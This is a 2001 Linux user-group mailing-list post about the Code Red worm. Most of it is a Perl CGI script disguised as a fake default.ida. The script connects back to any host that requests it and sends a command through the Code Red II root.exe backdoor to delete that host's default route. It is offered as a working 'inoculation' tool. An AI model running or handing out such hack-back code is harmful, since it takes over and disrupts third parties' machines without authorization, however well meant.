[NCLUG] Code Red fun
J. Paul Reed
preed at sigkill.com
Tue Aug 7 23:33:26 MDT 2001
On Tue, 7 Aug 2001, Charles Clarke wrote:
> I wish I had the time to write a "Code Red Worm Innoculation" program
> that I could use on the servers which contact mine.
The version of my fake default.ida I wrote after I sent the first one to
the list does exactly that (albeit, only for Code Red II boxes):
#!/usr/bin/perl
use Socket;
print "Content-type:text/html\n\n";
$socket = IO::Socket::INET->new(PeerAddr => $ENV{REMOTE_ADDR},
PeerPort => 80,
Proto => "tcp",
Type => SOCK_STREAM);
print $socket "GET /scripts/root.exe?/c+route+delete+0.0.0.0+>+fix_your_damn_r00ted_box";
close($socket);
Later,
Paul
---------------------------------------------------------------------
J. Paul Reed preed at sigkill.com || web.sigkill.com/preed
It's amazing what a little brain damage will do for your credibility.
-- Leonard Shelby, Memento
More information about the NCLUG
mailing list